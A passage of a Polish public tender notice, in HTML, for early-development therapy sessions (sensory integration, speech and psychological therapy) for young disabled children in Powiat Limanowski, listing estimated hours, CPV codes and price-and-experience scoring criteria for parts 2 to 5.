Obliczenie punktacji, zgodnie z wyżej wskazanymi kryteriami, będą dokonywane z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie w pracy z dziecmi w wieku 0-7 lat w zakresie wczsnego wspomagania rozwoju</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie częściowe nr 2: Prowadzenie zajęć terapii integracji sensorycznej.<br/>Szacowana ilość godzin 542.<br/><br/>1. Przedmiotem zamówienia jest przeprowadzenie zajęć wczesnego wspomagania rozwoju dziecka i zajęć specjalistycznych dla dzieci z niepełnosprawnościami oraz zagrożonych niepełnosprawnością, w wieku od 0 do chwili rozpoczęcia przez dziecko nauki w szkole, z terenu Powiatu Limanowskiego w ramach zadania z zakresu administracji rządowej, wynikających z programu kompleksowego wsparcia dla rodzin „Za życiem”, stanowiącego załącznik do uchwały Nr 189 Rady Ministrów z dnia 27 grudnia 2021 r. zmieniającej uchwałę w sprawie programu kompleksowego wsparcia dla rodzin „Za Życiem” (M.P. z 2022 poz. 64), zwanego dalej „Programem”, w zakresie realizacji zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego na obszarze powiatu, określonych w art. 90v ust. 4 ustawy z dnia 7 września 1991 r. o systemie oświaty oraz w rozporządzeniu Ministra Edukacji Narodowej z dnia 5 września 2017 r. w sprawie szczegółowych zadań wiodących ośrodków koordynacyjno – rehabilitacyjno – opiekuńczych – zadanie 2.4 Programu: „Wieloaspektowa i kompleksowa pomoc niepełnosprawnemu dziecku w okresie od 0. Roku życia do rozpoczęcia nauki w szkole oraz jego rodzinie”, na rzez Specjalnego Ośrodka Szkolno – Wychowawczego w Dobrej.<br/>2. Liczba godzin do zrealizowania w każdej z części zamówienia została podana w maksymalnym zakresie. Zamawiający zastrzega możliwość zmniejszenia liczby godzin w ramach każdej części zamówienia w zależności od liczby dzieci skierowanych do programu i zdiagnozowanych u nich potrzeb terapeutycznych. Rozliczenie następuje miesięcznie na podstawie faktycznie zrealizowanych godzin. W odniesieniu do każdej części zamówienia Zamawiający zleci Wykonawcy liczbę godzin zgodnie z zapotrzebowaniem, nie mniej niż 75 % liczby godzin w danej części zamówienia (zaokrąglając w dół do równej liczby godzin). <br/>3. Usługi świadczone będą w formie indywidualnych zajęć z dziećmi w wieku od 0. roku życia do rozpoczęcia nauki w szkole oraz z ich rodzinami.<br/>4. Czas trwania zajęć określa się jako 1 godzinę zegarową, tj. 60 minut. <br/>5. Wykonawca zapewni pomieszczenia/gabinet do prowadzenia zajęć i poniesie koszty związane z ich utrzymaniem, z uwzględnieniem wymogów dotyczących dostępności, o których mowa w pkt 3.11 SWZ. Wykonawca zapewnia sprzęt i pomoce dydaktyczne niezbędne do przeprowadzenia zajęć.<br/>6. Szczegółowy opis przedmiotu zamówienia oraz warunki wykonania zamówienia zawarte są w opisie przedmiotu zamówienia oraz w projektowanych postanowieniach umowy będących załącznikami do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80340000-9 - Usługi edukacji specjalnej</p> <p class="mb-0">85121270-6 - Usługi psychiatryczne lub psychologiczne</p> <p class="mb-0">85142100-7 - Usługi fizjoterapii</p> <p class="mb-0">85312500-4 - Usługi rehabilitacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Punkty przyznawane za podane kryteria będą liczone według następujących wzorów:<br/>1)	Kryterium 1 - Cena (C) – dla wszystkich zadań częściowych<br/>W kryterium „Cena” można uzyskać maksymalnie 60 pkt. Oferta o najniższej cenie otrzyma 60 pkt, pozostałe proporcjonalnie mniej. <br/>Ostatecznie oferta otrzyma w tym kryterium zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikająca z działania: <br/>Liczba punktów = (Cmin/Cof) * 100 * waga, gdzie:<br/>- Cmin - najniższa cena spośród wszystkich ofert w danym zadaniu,<br/>- Cof - cena podana w ofercie w danym zadaniu.<br/>2)	Kryterium 2 – Doświadczenie w pracy z dziećmi w wieku 0-7 lat w zakresie wczesnego wspomagania rozwoju (D) – dla wszystkich zadań częściowych <br/>W kryterium doświadczenie w pracy z dziećmi w wieku 0 - 7 lat w zakresie wczesnego wspomagania rozwoju (D) oceniane będzie doświadczenie osoby wskazanej przez Wykonawcę w pkt 2 formularza oferty, w pracy z dziećmi w wieku 0 – 7 lat w zakresie wczesnego wspomagania rozwoju. W tym kryterium można otrzymać maksymalnie 40 pkt. Oceniana będzie podana w Formularzu ofert w pkt 2 ilość lat doświadczenia (należy wskazywać zakończony rok pracy z dziećmi), odpowiednio dla zadania częściowego, <br/><br/>Ocena tego kryterium zostanie dokonana na podstawie oświadczenia Wykonawcy złożonego w formularzu oferty zgodnie z poniższą tabelą:<br/>Doświadczenie w pracy z dziećmi w wieku 0-7 lat w zakresie wczesnego wspomagania rozwoju<br/>Od 0 do 1 roku doświadczenia - 5 pkt<br/>Od 2 do 5 lat doświadczenia - 10 pkt<br/>Od 6 do 9 lat doświadczenia - 20 pkt<br/>Od 10 do 13 lat doświadczenia - 30 pkt<br/>Powyżej 14 lat doświadczenia - 40 pkt<br/><br/>Wskazane w Formularzu oferty doświadczenie powinno pozwolić Zamawiającemu na ocenę oferty w sposób jednoznaczny i precyzyjny. Brak wypełnienia, niejednoznaczne, niepełne lub nieprawidłowe wypełnienie dokumentów mających wykazać doświadczenie obciąża Wykonawcę i skutkować będzie nie przyznaniem w tym kryterium punktów.<br/>Zamawiający wymaga dla każdej części minimum 1 osobę, która będzie skierowana do realizacji zamówienia w danym zadaniu. Wykonawca wskazuje tę osobę w Formularzu oferty w pkt 2 odpowiednio dla zadania częściowego w ilości zgodnej z wymaganą minimalną liczbą osób. Jeśli Wykonawca wskaże więcej niż 1 osobę do realizacji zamówienia w tym kryterium uzyska punkty wyliczone wg średniej arytmetycznej - punkty przyznane poszczególnym osobom zostaną zsumowane i podzielone przez liczbę wskazanych osób.<br/>Osoba wskazana do realizacji zamówienia (której doświadczenie podlega ocenie w ramach kryterium), będzie także oceniana zgodnie z pkt 6.2 ppkt 4 SWZ i ma obowiązek realizować zamówienie. Zastąpienie tej osoby jest możliwe w okolicznościach o których mowa w § 3 ust. 7 PPU tylko za zgodą Zamawiającego i pod warunkiem że nowa osoba posiada uprawnienia/doświadczenie nie mniejsze niż osoba zastępowana.<br/>W Formularzu oferty, odpowiednio dla zadania częściowego, należy wskazać wszystkie wymagane dane umożliwiające ocenę kryterium. Dane te nie podlegają uzupełnieniu. <br/>2. Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który spełni wszystkie postawione w niniejszej SWZ warunki oraz uzyska łącznie największą liczbę punktów za wszystkie kryteria obliczoną wg wzoru: P = C + D, gdzie P - wynik oceny dla zadań 1 – 5. Pozostałe oferty zostaną sklasyfikowane zgodnie z ilością przyznanych punktów. Obliczenie punktacji, zgodnie z wyżej wskazanymi kryteriami, będą dokonywane z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie w pracy z dziecmi w wieku 0-7 lat w zakresie wczsnego wspomagania rozwoju</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie częściowe nr 3: Prowadzenie zajęć terapii logopedycznej I.<br/>Szacowana ilość godzin 684.<br/>1. Przedmiotem zamówienia jest przeprowadzenie zajęć wczesnego wspomagania rozwoju dziecka i zajęć specjalistycznych dla dzieci z niepełnosprawnościami oraz zagrożonych niepełnosprawnością, w wieku od 0 do chwili rozpoczęcia przez dziecko nauki w szkole, z terenu Powiatu Limanowskiego w ramach zadania z zakresu administracji rządowej, wynikających z programu kompleksowego wsparcia dla rodzin „Za życiem”, stanowiącego załącznik do uchwały Nr 189 Rady Ministrów z dnia 27 grudnia 2021 r. zmieniającej uchwałę w sprawie programu kompleksowego wsparcia dla rodzin „Za Życiem” (M.P. z 2022 poz. 64), zwanego dalej „Programem”, w zakresie realizacji zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego na obszarze powiatu, określonych w art. 90v ust. 4 ustawy z dnia 7 września 1991 r. o systemie oświaty oraz w rozporządzeniu Ministra Edukacji Narodowej z dnia 5 września 2017 r. w sprawie szczegółowych zadań wiodących ośrodków koordynacyjno – rehabilitacyjno – opiekuńczych – zadanie 2.4 Programu: „Wieloaspektowa i kompleksowa pomoc niepełnosprawnemu dziecku w okresie od 0. Roku życia do rozpoczęcia nauki w szkole oraz jego rodzinie”, na rzez Specjalnego Ośrodka Szkolno – Wychowawczego w Dobrej.<br/>2. Liczba godzin do zrealizowania w każdej z części zamówienia została podana w maksymalnym zakresie. Zamawiający zastrzega możliwość zmniejszenia liczby godzin w ramach każdej części zamówienia w zależności od liczby dzieci skierowanych do programu i zdiagnozowanych u nich potrzeb terapeutycznych. Rozliczenie następuje miesięcznie na podstawie faktycznie zrealizowanych godzin. W odniesieniu do każdej części zamówienia Zamawiający zleci Wykonawcy liczbę godzin zgodnie z zapotrzebowaniem, nie mniej niż 75 % liczby godzin w danej części zamówienia (zaokrąglając w dół do równej liczby godzin). <br/>3. Usługi świadczone będą w formie indywidualnych zajęć z dziećmi w wieku od 0. roku życia do rozpoczęcia nauki w szkole oraz z ich rodzinami.<br/>4. Czas trwania zajęć określa się jako 1 godzinę zegarową, tj. 60 minut. <br/>5. Wykonawca zapewni pomieszczenia/gabinet do prowadzenia zajęć i poniesie koszty związane z ich utrzymaniem, z uwzględnieniem wymogów dotyczących dostępności, o których mowa w pkt 3.11 SWZ. Wykonawca zapewnia sprzęt i pomoce dydaktyczne niezbędne do przeprowadzenia zajęć.<br/>6. Szczegółowy opis przedmiotu zamówienia oraz warunki wykonania zamówienia zawarte są w opisie przedmiotu zamówienia oraz w projektowanych postanowieniach umowy będących załącznikami do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80340000-9 - Usługi edukacji specjalnej</p> <p class="mb-0">85121270-6 - Usługi psychiatryczne lub psychologiczne</p> <p class="mb-0">85142100-7 - Usługi fizjoterapii</p> <p class="mb-0">85312500-4 - Usługi rehabilitacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Punkty przyznawane za podane kryteria będą liczone według następujących wzorów:<br/>1)	Kryterium 1 - Cena (C) – dla wszystkich zadań częściowych<br/>W kryterium „Cena” można uzyskać maksymalnie 60 pkt. Oferta o najniższej cenie otrzyma 60 pkt, pozostałe proporcjonalnie mniej. <br/>Ostatecznie oferta otrzyma w tym kryterium zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikająca z działania: <br/>Liczba punktów = (Cmin/Cof) * 100 * waga, gdzie:<br/>- Cmin - najniższa cena spośród wszystkich ofert w danym zadaniu,<br/>- Cof - cena podana w ofercie w danym zadaniu.<br/>2)	Kryterium 2 – Doświadczenie w pracy z dziećmi w wieku 0-7 lat w zakresie wczesnego wspomagania rozwoju (D) – dla wszystkich zadań częściowych <br/>W kryterium doświadczenie w pracy z dziećmi w wieku 0 - 7 lat w zakresie wczesnego wspomagania rozwoju (D) oceniane będzie doświadczenie osoby wskazanej przez Wykonawcę w pkt 2 formularza oferty, w pracy z dziećmi w wieku 0 – 7 lat w zakresie wczesnego wspomagania rozwoju. W tym kryterium można otrzymać maksymalnie 40 pkt. Oceniana będzie podana w Formularzu ofert w pkt 2 ilość lat doświadczenia (należy wskazywać zakończony rok pracy z dziećmi), odpowiednio dla zadania częściowego, <br/><br/>Ocena tego kryterium zostanie dokonana na podstawie oświadczenia Wykonawcy złożonego w formularzu oferty zgodnie z poniższą tabelą:<br/>Doświadczenie w pracy z dziećmi w wieku 0-7 lat w zakresie wczesnego wspomagania rozwoju<br/>Od 0 do 1 roku doświadczenia - 5 pkt<br/>Od 2 do 5 lat doświadczenia - 10 pkt<br/>Od 6 do 9 lat doświadczenia - 20 pkt<br/>Od 10 do 13 lat doświadczenia - 30 pkt<br/>Powyżej 14 lat doświadczenia - 40 pkt<br/><br/>Wskazane w Formularzu oferty doświadczenie powinno pozwolić Zamawiającemu na ocenę oferty w sposób jednoznaczny i precyzyjny. Brak wypełnienia, niejednoznaczne, niepełne lub nieprawidłowe wypełnienie dokumentów mających wykazać doświadczenie obciąża Wykonawcę i skutkować będzie nie przyznaniem w tym kryterium punktów.<br/>Zamawiający wymaga dla każdej części minimum 1 osobę, która będzie skierowana do realizacji zamówienia w danym zadaniu. Wykonawca wskazuje tę osobę w Formularzu oferty w pkt 2 odpowiednio dla zadania częściowego w ilości zgodnej z wymaganą minimalną liczbą osób. Jeśli Wykonawca wskaże więcej niż 1 osobę do realizacji zamówienia w tym kryterium uzyska punkty wyliczone wg średniej arytmetycznej - punkty przyznane poszczególnym osobom zostaną zsumowane i podzielone przez liczbę wskazanych osób.<br/>Osoba wskazana do realizacji zamówienia (której doświadczenie podlega ocenie w ramach kryterium), będzie także oceniana zgodnie z pkt 6.2 ppkt 4 SWZ i ma obowiązek realizować zamówienie. Zastąpienie tej osoby jest możliwe w okolicznościach o których mowa w § 3 ust. 7 PPU tylko za zgodą Zamawiającego i pod warunkiem że nowa osoba posiada uprawnienia/doświadczenie nie mniejsze niż osoba zastępowana.<br/>W Formularzu oferty, odpowiednio dla zadania częściowego, należy wskazać wszystkie wymagane dane umożliwiające ocenę kryterium. Dane te nie podlegają uzupełnieniu. <br/>2. Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który spełni wszystkie postawione w niniejszej SWZ warunki oraz uzyska łącznie największą liczbę punktów za wszystkie kryteria obliczoną wg wzoru: P = C + D, gdzie P - wynik oceny dla zadań 1 – 5. Pozostałe oferty zostaną sklasyfikowane zgodnie z ilością przyznanych punktów. Obliczenie punktacji, zgodnie z wyżej wskazanymi kryteriami, będą dokonywane z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie w pracy z dziecmi w wieku 0-7 lat w zakresie wczsnego wspomagania rozwoju</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie częściowe nr 4: Prowadzenie zajęć terapii logopedycznej II.<br/>Szacowana ilość godzin 1 124.<br/>1. Przedmiotem zamówienia jest przeprowadzenie zajęć wczesnego wspomagania rozwoju dziecka i zajęć specjalistycznych dla dzieci z niepełnosprawnościami oraz zagrożonych niepełnosprawnością, w wieku od 0 do chwili rozpoczęcia przez dziecko nauki w szkole, z terenu Powiatu Limanowskiego w ramach zadania z zakresu administracji rządowej, wynikających z programu kompleksowego wsparcia dla rodzin „Za życiem”, stanowiącego załącznik do uchwały Nr 189 Rady Ministrów z dnia 27 grudnia 2021 r. zmieniającej uchwałę w sprawie programu kompleksowego wsparcia dla rodzin „Za Życiem” (M.P. z 2022 poz. 64), zwanego dalej „Programem”, w zakresie realizacji zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego na obszarze powiatu, określonych w art. 90v ust. 4 ustawy z dnia 7 września 1991 r. o systemie oświaty oraz w rozporządzeniu Ministra Edukacji Narodowej z dnia 5 września 2017 r. w sprawie szczegółowych zadań wiodących ośrodków koordynacyjno – rehabilitacyjno – opiekuńczych – zadanie 2.4 Programu: „Wieloaspektowa i kompleksowa pomoc niepełnosprawnemu dziecku w okresie od 0. Roku życia do rozpoczęcia nauki w szkole oraz jego rodzinie”, na rzez Specjalnego Ośrodka Szkolno – Wychowawczego w Dobrej.<br/>2. Liczba godzin do zrealizowania w każdej z części zamówienia została podana w maksymalnym zakresie. Zamawiający zastrzega możliwość zmniejszenia liczby godzin w ramach każdej części zamówienia w zależności od liczby dzieci skierowanych do programu i zdiagnozowanych u nich potrzeb terapeutycznych. Rozliczenie następuje miesięcznie na podstawie faktycznie zrealizowanych godzin. W odniesieniu do każdej części zamówienia Zamawiający zleci Wykonawcy liczbę godzin zgodnie z zapotrzebowaniem, nie mniej niż 75 % liczby godzin w danej części zamówienia (zaokrąglając w dół do równej liczby godzin). <br/>3. Usługi świadczone będą w formie indywidualnych zajęć z dziećmi w wieku od 0. roku życia do rozpoczęcia nauki w szkole oraz z ich rodzinami.<br/>4. Czas trwania zajęć określa się jako 1 godzinę zegarową, tj. 60 minut. <br/>5. Wykonawca zapewni pomieszczenia/gabinet do prowadzenia zajęć i poniesie koszty związane z ich utrzymaniem, z uwzględnieniem wymogów dotyczących dostępności, o których mowa w pkt 3.11 SWZ. Wykonawca zapewnia sprzęt i pomoce dydaktyczne niezbędne do przeprowadzenia zajęć.<br/>6. Szczegółowy opis przedmiotu zamówienia oraz warunki wykonania zamówienia zawarte są w opisie przedmiotu zamówienia oraz w projektowanych postanowieniach umowy będących załącznikami do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80340000-9 - Usługi edukacji specjalnej</p> <p class="mb-0">85121270-6 - Usługi psychiatryczne lub psychologiczne</p> <p class="mb-0">85142100-7 - Usługi fizjoterapii</p> <p class="mb-0">85312500-4 - Usługi rehabilitacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Punkty przyznawane za podane kryteria będą liczone według następujących wzorów:<br/>1)	Kryterium 1 - Cena (C) – dla wszystkich zadań częściowych<br/>W kryterium „Cena” można uzyskać maksymalnie 60 pkt. Oferta o najniższej cenie otrzyma 60 pkt, pozostałe proporcjonalnie mniej. <br/>Ostatecznie oferta otrzyma w tym kryterium zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikająca z działania: <br/>Liczba punktów = (Cmin/Cof) * 100 * waga, gdzie:<br/>- Cmin - najniższa cena spośród wszystkich ofert w danym zadaniu,<br/>- Cof - cena podana w ofercie w danym zadaniu.<br/>2)	Kryterium 2 – Doświadczenie w pracy z dziećmi w wieku 0-7 lat w zakresie wczesnego wspomagania rozwoju (D) – dla wszystkich zadań częściowych <br/>W kryterium doświadczenie w pracy z dziećmi w wieku 0 - 7 lat w zakresie wczesnego wspomagania rozwoju (D) oceniane będzie doświadczenie osoby wskazanej przez Wykonawcę w pkt 2 formularza oferty, w pracy z dziećmi w wieku 0 – 7 lat w zakresie wczesnego wspomagania rozwoju. W tym kryterium można otrzymać maksymalnie 40 pkt. Oceniana będzie podana w Formularzu ofert w pkt 2 ilość lat doświadczenia (należy wskazywać zakończony rok pracy z dziećmi), odpowiednio dla zadania częściowego, <br/><br/>Ocena tego kryterium zostanie dokonana na podstawie oświadczenia Wykonawcy złożonego w formularzu oferty zgodnie z poniższą tabelą:<br/>Doświadczenie w pracy z dziećmi w wieku 0-7 lat w zakresie wczesnego wspomagania rozwoju<br/>Od 0 do 1 roku doświadczenia - 5 pkt<br/>Od 2 do 5 lat doświadczenia - 10 pkt<br/>Od 6 do 9 lat doświadczenia - 20 pkt<br/>Od 10 do 13 lat doświadczenia - 30 pkt<br/>Powyżej 14 lat doświadczenia - 40 pkt<br/><br/>Wskazane w Formularzu oferty doświadczenie powinno pozwolić Zamawiającemu na ocenę oferty w sposób jednoznaczny i precyzyjny. Brak wypełnienia, niejednoznaczne, niepełne lub nieprawidłowe wypełnienie dokumentów mających wykazać doświadczenie obciąża Wykonawcę i skutkować będzie nie przyznaniem w tym kryterium punktów.<br/>Zamawiający wymaga dla każdej części minimum 1 osobę, która będzie skierowana do realizacji zamówienia w danym zadaniu. Wykonawca wskazuje tę osobę w Formularzu oferty w pkt 2 odpowiednio dla zadania częściowego w ilości zgodnej z wymaganą minimalną liczbą osób. Jeśli Wykonawca wskaże więcej niż 1 osobę do realizacji zamówienia w tym kryterium uzyska punkty wyliczone wg średniej arytmetycznej - punkty przyznane poszczególnym osobom zostaną zsumowane i podzielone przez liczbę wskazanych osób.<br/>Osoba wskazana do realizacji zamówienia (której doświadczenie podlega ocenie w ramach kryterium), będzie także oceniana zgodnie z pkt 6.2 ppkt 4 SWZ i ma obowiązek realizować zamówienie. Zastąpienie tej osoby jest możliwe w okolicznościach o których mowa w § 3 ust. 7 PPU tylko za zgodą Zamawiającego i pod warunkiem że nowa osoba posiada uprawnienia/doświadczenie nie mniejsze niż osoba zastępowana.<br/>W Formularzu oferty, odpowiednio dla zadania częściowego, należy wskazać wszystkie wymagane dane umożliwiające ocenę kryterium. Dane te nie podlegają uzupełnieniu. <br/>2. Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który spełni wszystkie postawione w niniejszej SWZ warunki oraz uzyska łącznie największą liczbę punktów za wszystkie kryteria obliczoną wg wzoru: P = C + D, gdzie P - wynik oceny dla zadań 1 – 5. Pozostałe oferty zostaną sklasyfikowane zgodnie z ilością przyznanych punktów. Obliczenie punktacji, zgodnie z wyżej wskazanymi kryteriami, będą dokonywane z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie w pracy z dziecmi w wieku 0-7 lat w zakresie wczsnego wspomagania rozwoju</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie częściowe nr 5: Prowadzenie zajęć terapii psychologicznej. Szacowana ilość godzin 255.<br/>1. Przedmiotem zamówienia jest przeprowadzenie zajęć wczesnego wspomagania rozwoju dziecka i zajęć specjalistycznych dla dzieci z niepełnosprawnościami oraz zagrożonych niepełnosprawnością, w wieku od 0 do chwili rozpoczęcia przez dziecko nauki w szkole, z terenu Powiatu Limanowskiego w ramach zadania z zakresu administracji rządowej, wynikających z programu kompleksowego wsparcia dla rodzin „Za życiem”, stanowiącego załącznik do uchwały Nr 189 Rady Ministrów z dnia 27 grudnia 2021 r. zmieniającej uchwałę w sprawie programu kompleksowego wsparcia dla rodzin „Za Życiem” (M.P. z 2022 poz. 64), zwanego dalej „Programem”, w zakresie realizacji zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego na obszarze powiatu, określonych w art. 90v ust. 4 ustawy z dnia 7 września 1991 r. o systemie oświaty oraz w rozporządzeniu Ministra Edukacji Narodowej z dnia 5 września 2017 r. w sprawie szczegółowych zadań wiodących ośrodków koordynacyjno – rehabilitacyjno – opiekuńczych – zadanie 2.4 Programu: „Wieloaspektowa i kompleksowa pomoc niepełnosprawnemu dziecku w okresie od 0. Roku życia do rozpoczęcia nauki w szkole oraz jego rodzinie”, na rzez Specjalnego Ośrodka Szkolno – Wychowawczego w Dobrej.<br/>2. Liczba godzin do zrealizowania w każdej z części zamówienia została podana w maksymalnym zakresie. Zamawiający zastrzega możliwość zmniejszenia liczby godzin w ramach każdej części zamówienia w zależności od liczby dzieci skierowanych do programu i zdiagnozowanych u nich potrzeb terapeutycznych. Rozliczenie następuje miesięcznie na podstawie faktycznie zrealizowanych godzin. W odniesieniu do każdej części zamówienia Zamawiający zleci Wykonawcy liczbę godzin zgodnie z zapotrzebowaniem, nie mniej niż 75 % liczby godzin w danej części zamówienia (zaokrąglając w dół do równej liczby godzin). <br/>3. Usługi świadczone będą w formie indywidualnych zajęć z dziećmi w wieku od 0. roku życia do rozpoczęcia nauki w szkole oraz z ich rodzinami.<br/>4. Czas trwania zajęć określa się jako 1 godzinę zegarową, tj. 60 minut. <br/>5. Wykonawca zapewni pomieszczenia/gabinet do prowadzenia zajęć i poniesie koszty związane z ich utrzymaniem, z uwzględnieniem wymogów dotyczących dostępności, o których mowa w pkt 3.11 SWZ. Wykonawca zapewnia sprzęt i pomoce dydaktyczne niezbędne do przeprowadzenia zajęć.<br/>6. Szczegółowy opis przedmiotu zamówienia oraz warunki 